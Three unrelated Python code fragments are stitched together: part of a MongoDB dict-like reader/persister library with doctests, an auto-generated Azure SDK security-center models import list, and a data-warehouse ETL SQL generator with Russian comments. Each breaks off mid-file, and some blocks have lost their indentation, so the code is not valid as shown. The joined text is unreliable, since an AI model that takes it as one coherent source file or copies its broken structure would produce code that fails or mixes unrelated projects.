        iter_projection: ProjectionSpec = (ID,),
        getitem_projection: ProjectionSpec = None,
        **mgc_find_kwargs,
    ):
        """
        :param mgc: pymongo collection (or a spec resolvable to one)
        :param filter: mongo query dict restricting the visible subset
        :param iter_projection: projection used for keys (must not be None)
        :param getitem_projection: projection used for values returned by __getitem__
        :param mgc_find_kwargs: extra keyword args forwarded to ``mgc.find``
        """
        assert iter_projection is not None, 'iter_projection cannot be None'
        super().__init__(
            mgc=mgc, filter=filter, iter_projection=iter_projection, **mgc_find_kwargs,
        )
        self._getitem_projection = getitem_projection

    def __getitem__(self, k):
        """Return a pymongo Cursor over documents matching ``k`` merged with ``self.filter``.

        Never raises KeyError: a miss is simply a cursor yielding nothing.
        """
        assert isinstance(
            k, Mapping
        ), f'k (key) must be a mapping (typically a dictionary). Was:\n\tk={k}'
        return self.mgc.find(
            filter=self._merge_with_filt(k), projection=self._getitem_projection,
        )

    def keys(self):
        """Return a plain ``KeysView`` over this reader."""
        return KeysView(self)

    def values(self) -> MongoValuesView:
        """Return a mongo-specialized values view."""
        return MongoValuesView(self)

    @cached_property
    def _items_projection(self):
        # Union of the key and value projections, so items() can fetch both
        # in a single find and split each doc afterwards.
        return projection_union(
            self._iter_projection,
            self._getitem_projection,
            already_flattened=self._projections_are_flattened,
        )

    @cached_property
    def key_fields(self):
        """Fields included (value True) in the iter projection — the key schema."""
        _iter_projection = normalize_projection(self._iter_projection)
        return tuple(
            field for field in _iter_projection if _iter_projection[field] is True
        )

    @cached_property
    def val_fields(self):
        """Fields included in the getitem projection, or None if no projection was given."""
        if self._getitem_projection is None:
            return None
        else:
            _getitem_projection = normalize_projection(self._getitem_projection)
            return tuple(
                field
                for field in _getitem_projection
                if _getitem_projection[field] is True
            )

    def items(self) -> MongoItemsView:
        """Return a mongo-specialized items view."""
        return MongoItemsView(self)

    @classmethod
    def from_params(
        cls,
        db_name: str = DFLT_TEST_DB,
        collection_name: str = 'test',
        mongo_client: Optional[dict] = None,
        filter: Optional[dict] = None,
        iter_projection: ProjectionSpec = (ID,),
        getitem_projection: ProjectionSpec = None,
        **mgc_find_kwargs,
    ):
        """Alternate constructor from db/collection names and optional MongoClient kwargs."""
        if mongo_client is None:
            mongo_client = MongoClient()
        elif isinstance(mongo_client, dict):
            # A dict is taken as MongoClient constructor kwargs.
            mongo_client = MongoClient(**mongo_client)
        return cls(
            mgc=mongo_client[db_name][collection_name],
            filter=filter,
            iter_projection=iter_projection,
            getitem_projection=getitem_projection,
            **mgc_find_kwargs,
        )

    def distinct(self, key, filter=None, **kwargs):
        """Distinct values of ``key`` among documents matching this reader's filter (plus ``filter``)."""
        # TODO: Check if this is correct (what about $ cases?): filter=m._merge_with_filt(filter)
        return self.mgc.distinct(
            key, filter=self._merge_with_filt(filter or {}), **kwargs
        )

    # alias: `unique` reads better in some dataframe-flavored code
    unique = distinct
class MongoCollectionFieldsReader(MongoCollectionReader):
    """A base class to read from a mongo collection, or subset thereof, with the Mapping (i.e. dict-like) interface.
    An "easier" interface for the common case where we just want to specify fixed fields for keys and vals.
    """

    # key/val specs are given as flat field tuples, already "flattened".
    _projections_are_flattened = True

    def __init__(
        self,
        mgc: Union[PyMongoCollectionSpec, KvReader] = None,
        filter: Optional[dict] = None,
        key_fields: ProjectionSpec = (ID,),
        val_fields: ProjectionSpec = None,
    ):
        """
        :param mgc: pymongo collection (or a spec resolvable to one)
        :param filter: mongo query dict restricting the visible subset
        :param key_fields: fields that make up the key of each item
        :param val_fields: fields that make up the value of each item
        """
        # (Removed a dead local: iter_projection was computed here and then
        # discarded, recomputed inside the super().__init__ call.)
        super().__init__(
            mgc=mgc,
            filter=filter,
            iter_projection=normalize_projection(key_fields),
            getitem_projection=normalize_projection(val_fields),
        )
        # Shadow the parent's cached properties with the explicit field specs.
        self.key_fields = key_fields
        self.val_fields = val_fields
class MongoCollectionPersister(MongoCollectionReader):
"""base class to read from and write to a mongo collection, or subset thereof, with the MutableMapping interface.
>>> from mongodol.util import mk_dflt_mgc
>>> mongo_collection_obj = mk_dflt_mgc()
>>> s = MongoCollectionPersister(mongo_collection_obj, getitem_projection={'_id': False})
>>> for k in s: # deleting all docs in default collection
... del s[k]
>>> k = {'_id': 'foo'}
>>> v = {'val': 'bar'}
>>> k in s # see that key is not in store (and testing __contains__)
False
>>> len(s)
0
>>> s[k] = v
>>> len(s)
1
>>> list(s)
[{'_id': 'foo'}]
Since this is a base mongo store, the values are cursors, so to get an actual value, you need to fetch the first doc
>>> next(s[k])
{'val': 'bar'}
>>> next(s.get(k))
{'val': 'bar'}
Remember (see ``MongoCollectionReader`` docs) that ``s.get`` will never reach its default since
the reader will always return a cursor (possibly empty).
So in the following case, we should get an empty cursor (not a default value)
| |
# Repo: ankitarorabit/azure-sdk-for-python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AadConnectivityState
from ._models_py3 import AadExternalSecuritySolution
from ._models_py3 import AadSolutionProperties
from ._models_py3 import ActiveConnectionsNotInAllowedRange
from ._models_py3 import AdaptiveApplicationControlGroup
from ._models_py3 import AdaptiveApplicationControlGroups
from ._models_py3 import AdaptiveApplicationControlIssueSummary
from ._models_py3 import AdaptiveNetworkHardening
from ._models_py3 import AdaptiveNetworkHardeningEnforceRequest
from ._models_py3 import AdaptiveNetworkHardeningsList
from ._models_py3 import AdditionalData
from ._models_py3 import AdvancedThreatProtectionSetting
from ._models_py3 import Alert
from ._models_py3 import AlertEntity
from ._models_py3 import AlertList
from ._models_py3 import AlertsSuppressionRule
from ._models_py3 import AlertsSuppressionRulesList
from ._models_py3 import AllowedConnectionsList
from ._models_py3 import AllowedConnectionsResource
from ._models_py3 import AllowlistCustomAlertRule
from ._models_py3 import AmqpC2DMessagesNotInAllowedRange
from ._models_py3 import AmqpC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import AmqpD2CMessagesNotInAllowedRange
from ._models_py3 import AscLocation
from ._models_py3 import AscLocationList
from ._models_py3 import AssessmentLinks
from ._models_py3 import AssessmentStatus
from ._models_py3 import AtaExternalSecuritySolution
from ._models_py3 import AtaSolutionProperties
from ._models_py3 import AuthenticationDetailsProperties
from ._models_py3 import AutoProvisioningSetting
from ._models_py3 import AutoProvisioningSettingList
from ._models_py3 import Automation
from ._models_py3 import AutomationAction
from ._models_py3 import AutomationActionEventHub
from ._models_py3 import AutomationActionLogicApp
from ._models_py3 import AutomationActionWorkspace
from ._models_py3 import AutomationList
from ._models_py3 import AutomationRuleSet
from ._models_py3 import AutomationScope
from ._models_py3 import AutomationSource
from ._models_py3 import AutomationTriggeringRule
from ._models_py3 import AutomationValidationStatus
from ._models_py3 import AwAssumeRoleAuthenticationDetailsProperties
from ._models_py3 import AwsCredsAuthenticationDetailsProperties
from ._models_py3 import AzureResourceDetails
from ._models_py3 import AzureResourceIdentifier
from ._models_py3 import AzureResourceLink
from ._models_py3 import AzureTrackedResourceLocation
from ._models_py3 import Baseline
from ._models_py3 import BaselineAdjustedResult
from ._models_py3 import BenchmarkReference
from ._models_py3 import CVE
from ._models_py3 import CVSS
from ._models_py3 import CefExternalSecuritySolution
from ._models_py3 import CefSolutionProperties
from ._models_py3 import Compliance
from ._models_py3 import ComplianceList
from ._models_py3 import ComplianceResult
from ._models_py3 import ComplianceResultList
from ._models_py3 import ComplianceSegment
from ._models_py3 import ConnectableResource
from ._models_py3 import ConnectedResource
from ._models_py3 import ConnectedWorkspace
from ._models_py3 import ConnectionToIpNotAllowed
from ._models_py3 import ConnectorSetting
from ._models_py3 import ConnectorSettingList
from ._models_py3 import ContainerRegistryVulnerabilityProperties
from ._models_py3 import CustomAlertRule
from ._models_py3 import DataExportSettings
from ._models_py3 import DenylistCustomAlertRule
from ._models_py3 import Device
from ._models_py3 import DeviceList
from ._models_py3 import DeviceSecurityGroup
from ._models_py3 import DeviceSecurityGroupList
from ._models_py3 import DirectMethodInvokesNotInAllowedRange
from ._models_py3 import DiscoveredSecuritySolution
from ._models_py3 import DiscoveredSecuritySolutionList
from ._models_py3 import ETag
from ._models_py3 import EffectiveNetworkSecurityGroups
from ._models_py3 import ExternalSecuritySolution
from ._models_py3 import ExternalSecuritySolutionKind
from ._models_py3 import ExternalSecuritySolutionList
from ._models_py3 import ExternalSecuritySolutionProperties
from ._models_py3 import FailedLocalLoginsNotInAllowedRange
from ._models_py3 import FileUploadsNotInAllowedRange
from ._models_py3 import Firmware
from ._models_py3 import GcpCredentialsDetailsProperties
from ._models_py3 import HttpC2DMessagesNotInAllowedRange
from ._models_py3 import HttpC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import HttpD2CMessagesNotInAllowedRange
from ._models_py3 import HybridComputeSettingsProperties
from ._models_py3 import InformationProtectionKeyword
from ._models_py3 import InformationProtectionPolicy
from ._models_py3 import InformationProtectionPolicyList
from ._models_py3 import InformationType
from ._models_py3 import IoTSecurityAggregatedAlert
from ._models_py3 import IoTSecurityAggregatedAlertList
from ._models_py3 import IoTSecurityAggregatedAlertPropertiesTopDevicesListItem
from ._models_py3 import IoTSecurityAggregatedRecommendation
from ._models_py3 import IoTSecurityAggregatedRecommendationList
from ._models_py3 import IoTSecurityAlertedDevice
from ._models_py3 import IoTSecurityDeviceAlert
from ._models_py3 import IoTSecurityDeviceRecommendation
from ._models_py3 import IoTSecuritySolutionAnalyticsModel
from ._models_py3 import IoTSecuritySolutionAnalyticsModelList
from ._models_py3 import IoTSecuritySolutionAnalyticsModelPropertiesDevicesMetricsItem
from ._models_py3 import IoTSecuritySolutionModel
from ._models_py3 import IoTSecuritySolutionsList
from ._models_py3 import IoTSeverityMetrics
from ._models_py3 import IotAlert
from ._models_py3 import IotAlertList
from ._models_py3 import IotAlertListModel
from ._models_py3 import IotAlertModel
from ._models_py3 import IotAlertType
from ._models_py3 import IotAlertTypeList
from ._models_py3 import IotDefenderSettingsList
from ._models_py3 import IotDefenderSettingsModel
from ._models_py3 import IotRecommendation
from ._models_py3 import IotRecommendationList
from ._models_py3 import IotRecommendationListModel
from ._models_py3 import IotRecommendationModel
from ._models_py3 import IotRecommendationType
from ._models_py3 import IotRecommendationTypeList
from ._models_py3 import IotSensorsList
from ._models_py3 import IotSensorsModel
from ._models_py3 import IotSitesList
from ._models_py3 import IotSitesModel
from ._models_py3 import IpAddress
from ._models_py3 import JitNetworkAccessPoliciesList
from ._models_py3 import JitNetworkAccessPolicy
from ._models_py3 import JitNetworkAccessPolicyInitiatePort
from ._models_py3 import JitNetworkAccessPolicyInitiateRequest
from ._models_py3 import JitNetworkAccessPolicyInitiateVirtualMachine
from ._models_py3 import JitNetworkAccessPolicyVirtualMachine
from ._models_py3 import JitNetworkAccessPortRule
from ._models_py3 import JitNetworkAccessRequest
from ._models_py3 import JitNetworkAccessRequestPort
from ._models_py3 import JitNetworkAccessRequestVirtualMachine
from ._models_py3 import Kind
from ._models_py3 import ListCustomAlertRule
from ._models_py3 import LocalUserNotAllowed
from ._models_py3 import Location
from ._models_py3 import LogAnalyticsIdentifier
from ._models_py3 import MacAddress
from ._models_py3 import MqttC2DMessagesNotInAllowedRange
from ._models_py3 import MqttC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import MqttD2CMessagesNotInAllowedRange
from ._models_py3 import NetworkInterface
from ._models_py3 import OnPremiseIotSensor
from ._models_py3 import OnPremiseIotSensorsList
from ._models_py3 import OnPremiseResourceDetails
from ._models_py3 import OnPremiseSqlResourceDetails
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationList
from ._models_py3 import PackageDownloadInfo
from ._models_py3 import PackageDownloads
from ._models_py3 import PackageDownloadsCentralManager
from ._models_py3 import PackageDownloadsCentralManagerFull
from ._models_py3 import PackageDownloadsCentralManagerFullOvf
from ._models_py3 import PackageDownloadsSensor
from ._models_py3 import PackageDownloadsSensorFull
from ._models_py3 import PackageDownloadsSensorFullOvf
from ._models_py3 import PathRecommendation
from ._models_py3 import Pricing
from ._models_py3 import PricingList
from ._models_py3 import ProcessNotAllowed
from ._models_py3 import ProtectionMode
from ._models_py3 import Protocol
from ._models_py3 import ProxyServerProperties
from ._models_py3 import PublisherInfo
from ._models_py3 import QueryCheck
from ._models_py3 import QueuePurgesNotInAllowedRange
from ._models_py3 import RecommendationConfigurationProperties
from ._models_py3 import RegulatoryComplianceAssessment
from ._models_py3 import RegulatoryComplianceAssessmentList
from ._models_py3 import RegulatoryComplianceControl
from ._models_py3 import RegulatoryComplianceControlList
from ._models_py3 import RegulatoryComplianceStandard
from ._models_py3 import RegulatoryComplianceStandardList
from ._models_py3 import Remediation
from ._models_py3 import ResetPasswordInput
from ._models_py3 import Resource
from ._models_py3 import ResourceDetails
from ._models_py3 import ResourceIdentifier
from ._models_py3 import Rule
from ._models_py3 import RuleResults
from ._models_py3 import RuleResultsInput
from ._models_py3 import RuleResultsProperties
from ._models_py3 import RulesResults
from ._models_py3 import RulesResultsInput
from ._models_py3 import Scan
from ._models_py3 import ScanProperties
from ._models_py3 import ScanResult
from ._models_py3 import ScanResultProperties
from ._models_py3 import ScanResults
from ._models_py3 import Scans
from ._models_py3 import ScopeElement
from ._models_py3 import SecureScoreControlDefinitionItem
from ._models_py3 import SecureScoreControlDefinitionList
from ._models_py3 import SecureScoreControlDefinitionSource
from ._models_py3 import SecureScoreControlDetails
from ._models_py3 import SecureScoreControlList
from ._models_py3 import SecureScoreControlScore
from ._models_py3 import SecureScoreItem
from ._models_py3 import SecureScoresList
from ._models_py3 import SecurityAssessment
from ._models_py3 import SecurityAssessmentList
from ._models_py3 import SecurityAssessmentMetadata
from ._models_py3 import SecurityAssessmentMetadataList
from ._models_py3 import SecurityAssessmentMetadataPartnerData
from ._models_py3 import SecurityAssessmentMetadataProperties
from ._models_py3 import SecurityAssessmentPartnerData
from ._models_py3 import SecurityContact
from ._models_py3 import SecurityContactList
from ._models_py3 import SecuritySolution
from ._models_py3 import SecuritySolutionList
from ._models_py3 import SecuritySolutionsReferenceData
from ._models_py3 import SecuritySolutionsReferenceDataList
from ._models_py3 import SecuritySubAssessment
from ._models_py3 import SecuritySubAssessmentList
from ._models_py3 import SecurityTask
from ._models_py3 import SecurityTaskList
from ._models_py3 import SecurityTaskParameters
from ._models_py3 import SensitivityLabel
from ._models_py3 import Sensor
from ._models_py3 import ServerVulnerabilityAssessment
from ._models_py3 import ServerVulnerabilityAssessmentsList
from ._models_py3 import ServerVulnerabilityProperties
from ._models_py3 import ServicePrincipalProperties
from ._models_py3 import Setting
from ._models_py3 import SettingsList
from ._models_py3 import Site
from ._models_py3 import SqlServerVulnerabilityProperties
from ._models_py3 import SubAssessmentStatus
from ._models_py3 import SuppressionAlertsScope
from ._models_py3 import Tags
from ._models_py3 import TagsResource
from ._models_py3 import ThresholdCustomAlertRule
from ._models_py3 import TimeWindowCustomAlertRule
from ._models_py3 import TopologyList
from ._models_py3 import TopologyResource
from ._models_py3 import TopologySingleResource
from ._models_py3 import TopologySingleResourceChild
from ._models_py3 import TopologySingleResourceParent
from ._models_py3 import TrackedResource
from ._models_py3 import TwinUpdatesNotInAllowedRange
from ._models_py3 import UnauthorizedOperationsNotInAllowedRange
from ._models_py3 import UpdateIotSecuritySolutionData
from ._models_py3 import UpgradePackageDownloadInfo
from ._models_py3 import UserDefinedResourcesProperties
from ._models_py3 import UserRecommendation
from ._models_py3 import VaRule
from ._models_py3 import VendorReference
from ._models_py3 import VmRecommendation
from ._models_py3 import WorkspaceSetting
from ._models_py3 import WorkspaceSettingList
except (SyntaxError, ImportError):
from ._models import AadConnectivityState # type: ignore
from ._models import AadExternalSecuritySolution # type: ignore
from ._models import AadSolutionProperties # type: ignore
from ._models import ActiveConnectionsNotInAllowedRange # type: ignore
from ._models import AdaptiveApplicationControlGroup # type: ignore
from ._models import AdaptiveApplicationControlGroups # type: ignore
from ._models import AdaptiveApplicationControlIssueSummary # type: ignore
from ._models import AdaptiveNetworkHardening # type: ignore
from ._models import AdaptiveNetworkHardeningEnforceRequest # type: ignore
from ._models import AdaptiveNetworkHardeningsList # type: ignore
from ._models import AdditionalData # type: ignore
from ._models import AdvancedThreatProtectionSetting # type: ignore
from ._models import Alert # type: ignore
from ._models import AlertEntity # type: ignore
from ._models import AlertList # type: ignore
from ._models import AlertsSuppressionRule # type: ignore
from ._models import AlertsSuppressionRulesList # type: ignore
from ._models import AllowedConnectionsList # type: ignore
from ._models import AllowedConnectionsResource # type: ignore
from ._models import AllowlistCustomAlertRule # type: ignore
from ._models import AmqpC2DMessagesNotInAllowedRange # type: ignore
from ._models import AmqpC2DRejectedMessagesNotInAllowedRange # type: ignore
from ._models import AmqpD2CMessagesNotInAllowedRange # type: ignore
from ._models import AscLocation # type: ignore
from ._models import AscLocationList # type: ignore
from ._models import AssessmentLinks # type: ignore
from ._models import AssessmentStatus # type: ignore
from ._models import AtaExternalSecuritySolution # type: ignore
from ._models import | |
имени
l_table_name=p_table.queue_name
else:
l_table_name=p_table.name
l_schema=C_SCHEMA_TABLE_TYPE.get(p_table.type,None) # схема таблицы
l_sql="DROP VIEW IF EXISTS "+l_schema+"."+'"'+l_table_name+'";'
return l_sql
def get_source_table_delete_sql(p_source_table: object):
    """
    Build the SQL statement that deletes rows from a source table.

    :param p_source_table: SourceTable instance whose rows are to be removed
    :return: delete SQL produced by the active DBMS adapter
    """
    l_connection=Connection()
    return l_connection.dbms.get_source_table_delete_sql(
        p_source_table_id=str(p_source_table.id)
    )
def get_source_table_etl(p_source_table: object, p_attribute_value: str =None):
    """
    Build the ETL statement for a source table.

    :param p_source_table: SourceTable instance
    :param p_attribute_value: attribute values fetched from the source and
        prepared for insertion; defaults to a "%s" placeholder
    :return: ETL script produced by the active DBMS adapter
    """
    l_ordinary_names=[]
    l_update_attribute_sql=""
    for i_attribute in _get_table_attribute_property(p_table=p_source_table):
        if i_attribute.attribute_type==C_UPDATE:
            # the update attribute is appended after the ordinary ones
            l_update_attribute_sql='"'+str(i_attribute.id)+'"'
        elif i_attribute.attribute_type!=C_ETL_ATTR:
            l_ordinary_names.append(i_attribute.name)
    # attribute ids are emitted in the alphabetical order of their names
    l_attribute_sql="\n\t\t"
    for i_name in sorted(l_ordinary_names):
        for i_attribute in _get_table_attribute_property(p_table=p_source_table):
            if i_attribute.name==i_name:
                l_attribute_sql=l_attribute_sql+'"'+str(i_attribute.id)+'"'+",\n\t\t"
    l_attribute_sql=l_attribute_sql+l_update_attribute_sql
    return Connection().dbms.get_source_table_etl(
        p_source_table_id=p_source_table.id,
        p_source_attribute=l_attribute_sql,
        p_source_attribute_value=p_attribute_value or "%s"
    )
def get_idmap_etl(
    p_idmap: object,
    p_etl_id: str,
    p_source_table: object =None
):
    """
    Generate the ETL script(s) for an Idmap table.

    :param p_idmap: Idmap instance
    :param p_etl_id: id of the ETL process
    :param p_source_table: optional source table to load into the idmap;
        when omitted, a list with the ETL of every source table is returned
    :return: list of ETL scripts, one per processed source table
    """
    l_wanted_table_id=p_source_table.id if p_source_table else None
    # index the idmap service columns by attribute type (last match wins)
    l_columns={}
    for i_attribute in _get_table_attribute_property(p_table=p_idmap):
        l_columns[i_attribute.attribute_type]=i_attribute.id
    # natural keys are concatenated in the alphabetical order of their names
    l_nk_sorted=sorted(p_idmap.source_attribute_nk, key=lambda nk: nk.name)
    l_separator="\n\t\t||'@@'||\n\t\t"
    l_etl=[]
    for i_source_table in p_idmap.entity.source_table:
        if l_wanted_table_id and l_wanted_table_id!=i_source_table.id:
            continue  # a specific source table was requested and this is not it
        l_casts=[
            "CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))"
            for i_column_nk in l_nk_sorted
            if i_column_nk.source_table.id==i_source_table.id
        ]
        # generate the ETL for every source table
        l_etl.append(
            Connection().dbms.get_idmap_etl(
                p_idmap_id=p_idmap.id,
                p_idmap_rk_id=l_columns.get(C_RK),
                p_idmap_nk_id=l_columns.get(C_NK),
                p_etl_id=l_columns.get(C_ETL_ATTR),
                p_etl_value=p_etl_id,
                p_source_table_id=i_source_table.id,
                p_attribute_nk=l_separator.join(l_casts),
                p_source_id=i_source_table.source.source_id,
                p_max_rk=str(p_idmap.max_rk)
            )
        )
    return l_etl
def get_anchor_etl(
    p_anchor: object,
    p_etl_id: str
):
    """
    Generate the ETL script for an anchor table.

    :param p_anchor: Anchor instance
    :param p_etl_id: id of the ETL process
    :return: ETL script produced by the active DBMS adapter
    """
    # index anchor columns by attribute type (last match wins, as before)
    l_anchor_columns={
        i_attribute.attribute_type: i_attribute.id
        for i_attribute in _get_table_attribute_property(p_table=p_anchor)
    }
    # index the related idmap columns the same way
    l_idmap_columns={
        i_attribute.attribute_type: i_attribute.id
        for i_attribute in p_anchor.entity.idmap.idmap_attribute
    }
    return Connection().dbms.get_anchor_etl(
        p_anchor_id=p_anchor.id,
        p_anchor_rk_id=l_anchor_columns.get(C_RK),
        p_anchor_source_id=l_anchor_columns.get(C_SOURCE_ATTR),
        p_anchor_etl_id=l_anchor_columns.get(C_ETL_ATTR),
        p_idmap_id=p_anchor.entity.idmap.id,
        p_idmap_rk_id=l_idmap_columns.get(C_RK),
        p_idmap_nk_id=l_idmap_columns.get(C_NK),
        p_etl_value=p_etl_id
    )
def get_attribute_etl(p_attribute_table: object, p_etl_id: str, p_source_table: object =None):
    """
    Generates the ETL script for an attribute table

    :param p_attribute_table: AttributeTable instance
    :param p_etl_id: id of the ETL process
    :param p_source_table: source table to load into the attribute table
    (when omitted, a list with the ETL of every source table is returned)
    """
    l_etl=[]
    l_source_table_id=None
    if p_source_table:
        l_source_table_id=p_source_table.id
    l_attribute_rk_id=None
    l_attribute_column_id=None
    l_from_dttm_id=None
    l_to_dttm_id=None
    l_etl_id=None
    l_idmap_rk_id=None
    l_idmap_nk_id=None
    l_column_value_datatype=None
    # locate the service columns of the attribute table by attribute type
    for i_attribute in _get_table_attribute_property(p_table=p_attribute_table):
        if i_attribute.attribute_type==C_RK:
            l_attribute_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_VALUE:
            l_attribute_column_id=i_attribute.id
            l_column_value_datatype=i_attribute.datatype.data_type_sql
        if i_attribute.attribute_type==C_FROM:
            l_from_dttm_id=i_attribute.id
        if i_attribute.attribute_type==C_TO:
            l_to_dttm_id=i_attribute.id
        if i_attribute.attribute_type==C_ETL_ATTR:
            l_etl_id=i_attribute.id
    # locate the rk/nk columns of the related idmap
    for i_attribute in p_attribute_table.entity.idmap.idmap_attribute:
        if i_attribute.attribute_type==C_RK:
            l_idmap_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_NK:
            l_idmap_nk_id=i_attribute.id
    for i_source_attribute in p_attribute_table.entity_attribute.source_attribute:
        if l_source_table_id and l_source_table_id!=i_source_attribute.source_table.id: # skip the source table unless it is the requested one
            continue
        l_column_nk_sql=""
        # natural keys are concatenated in the alphabetical order of their names
        l_source_attribute_nk=sorted(p_attribute_table.entity.idmap.source_attribute_nk, key=lambda nk: nk.name)
        for i_column_nk in l_source_attribute_nk:
            if i_source_attribute.source_table.id==i_column_nk.source_table.id:
                l_column_nk_sql=l_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
        l_column_value_id=i_source_attribute.id
        l_update_timestamp_id=None
        # find the update-timestamp attribute of the owning source table, if any
        for i_source_attribute_all in i_source_attribute.source_table.source_attribute:
            if i_source_attribute_all.attribute_type==C_UPDATE:
                l_update_timestamp_id=i_source_attribute_all.id
        l_column_nk_sql=l_column_nk_sql[:-14]  # drop the trailing "||'@@'||" separator
        l_source_id=i_source_attribute.source_table.source.source_id
        # generate the ETL for every source table
        l_etl.append(
            Connection().dbms.get_attribute_etl(
                p_attribute_id=p_attribute_table.id,
                p_attribute_column_id=l_attribute_column_id,
                p_anchor_rk_id=l_attribute_rk_id,
                p_from_dttm_id=l_from_dttm_id,
                p_to_dttm_id=l_to_dttm_id,
                p_etl_id=l_etl_id,
                p_idmap_id=p_attribute_table.entity.idmap.id,
                p_idmap_rk_id=l_idmap_rk_id,
                p_idmap_nk_id=l_idmap_nk_id,
                p_stg_table_id=i_source_attribute.source_table.id,
                p_stg_attribute_id=l_column_value_id,
                p_data_type=l_column_value_datatype,
                p_attribute_concat_nk=l_column_nk_sql,
                p_update_timestamp_id=l_update_timestamp_id,
                p_source_id=l_source_id,
                p_etl_value=p_etl_id
            )
        )
    return l_etl
def get_tie_etl(
    p_tie: object,
    p_etl_id: str,
    p_source_table: object =None
):
    """
    Generates the ETL for a Tie table

    :param p_tie: Tie instance
    :param p_etl_id: id of the ETL process
    :param p_source_table: source table to load into the tie
    (when omitted, a list with the ETL of every source table is returned)
    """
    l_etl=[]
    l_source_table_id=None
    if p_source_table:
        l_source_table_id=p_source_table.id
    l_anchor_rk_id=None
    l_link_anchor_rk_id=None
    l_from_dttm_id=None
    l_to_dttm_id=None
    l_etl_id=None
    l_idmap_rk_id=None
    l_idmap_nk_id=None
    l_link_idmap_rk_id=None
    l_link_idmap_nk_id=None
    # locate the service columns of the tie table by attribute type
    for i_attribute in _get_table_attribute_property(p_table=p_tie):
        if i_attribute.attribute_type==C_RK:
            l_anchor_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_LINK_RK:
            l_link_anchor_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_FROM:
            l_from_dttm_id=i_attribute.id
        if i_attribute.attribute_type==C_TO:
            l_to_dttm_id=i_attribute.id
        if i_attribute.attribute_type==C_ETL_ATTR:
            l_etl_id=i_attribute.id
    # rk/nk columns of the idmap of the main entity
    for i_attribute in p_tie.entity.idmap.idmap_attribute:
        if i_attribute.attribute_type==C_RK:
            l_idmap_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_NK:
            l_idmap_nk_id=i_attribute.id
    # rk/nk columns of the idmap of the linked entity
    for i_attribute in p_tie.link_entity.idmap.idmap_attribute:
        if i_attribute.attribute_type==C_RK:
            l_link_idmap_rk_id=i_attribute.id
        if i_attribute.attribute_type==C_NK:
            l_link_idmap_nk_id=i_attribute.id
    for i_source_table in p_tie.source_table:
        if l_source_table_id and l_source_table_id!=i_source_table.id:
            continue # skip the source table unless it is the requested one
        l_column_nk_sql=""
        # natural keys of the main entity, concatenated in name order
        l_source_attribute_nk=sorted(p_tie.entity.idmap.source_attribute_nk, key=lambda nk: nk.name)
        for i_column_nk in l_source_attribute_nk:
            if i_source_table.id==i_column_nk.source_table.id:
                l_column_nk_sql=l_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
        l_link_column_nk_sql=""
        # natural keys of the linked entity
        for i_column_nk in p_tie.entity_attribute.source_attribute:
            if i_source_table.id==i_column_nk.source_table.id:
                l_link_column_nk_sql=l_link_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
        l_update_timestamp_id=None
        # find the update-timestamp attribute of the source table, if any
        for i_source_attribute in i_source_table.source_attribute:
            if i_source_attribute.attribute_type==C_UPDATE:
                l_update_timestamp_id=i_source_attribute.id
        l_column_nk_sql=l_column_nk_sql[:-14]  # drop the trailing "||'@@'||" separator
        l_link_column_nk_sql=l_link_column_nk_sql[:-14]  # same for the linked entity
        # generate the ETL for every source table
        l_etl.append(
            Connection().dbms.get_tie_etl(
                p_tie_id=p_tie.id,
                p_anchor_rk=l_anchor_rk_id,
                p_link_anchor_rk=l_link_anchor_rk_id,
                p_from_dttm_id=l_from_dttm_id,
                p_to_dttm_id=l_to_dttm_id,
                p_etl_id=l_etl_id,
                p_idmap_id=p_tie.entity.idmap.id,
                p_idmap_rk_id=l_idmap_rk_id,
                p_idmap_nk_id=l_idmap_nk_id,
                p_idmap_concat=l_column_nk_sql,
                p_link_idmap_id=p_tie.link_entity.idmap.id,
                p_link_idmap_rk_id=l_link_idmap_rk_id,
                p_link_idmap_nk_id=l_link_idmap_nk_id,
                p_link_idmap_concat=l_link_column_nk_sql,
                p_stg_table_id=i_source_table.id,
                p_update_timestamp_id=l_update_timestamp_id,
                p_source_id=i_source_table.source.source_id,
                p_etl_value=p_etl_id
            )
        )
    return l_etl
def get_max_etl_id():
    """
    Return the maximal etl_id recorded in the metadata.

    Objects whose etl attribute is missing are skipped, so the function
    never compares ``None`` with an integer (which would raise TypeError
    in Python 3).  Returns 0 when the metadata holds no etl ids at all.
    """
    # pull all etl objects from the metadata
    l_etls=meta.search_object(
        p_type=C_ETL
    )
    l_etl_id_list=[0] # seeded with 0 because the metadata may contain no etl_id
    for i_etl in l_etls:
        l_etl_id=i_etl.attrs.get(C_ETL_ATTRIBUTE_NAME)
        if l_etl_id is not None: # guard: a missing attribute would break max()
            l_etl_id_list.append(l_etl_id)
    return max(l_etl_id_list)
class _DWHObject:
"""
Обхъект ХД
"""
    def __init__(self,
                 p_type: str,
                 p_id: str =None,
                 p_name: str =None,
                 p_source_table =None,
                 p_source_attribute =None,
                 p_entity =None,
                 p_entity_attribute =None,
                 p_link_entity =None,
                 p_idmap =None,
                 p_idmap_attribute =None,
                 p_anchor =None,
                 p_anchor_attribute =None,
                 p_attribute_table =None,
                 p_attribute_table_attribute =None,
                 p_tie =None,
                 p_tie_attribute =None,
                 p_desc: str =None,
                 p_source =None
    ):
        """
        Constructor.

        :param p_type: type of the DWH object
        :param p_id: id of the DWH object; when omitted a generated uuid
            (``l_id``) is used instead and no metadata lookup is performed
        :param p_name: object name
        :param p_desc: object description
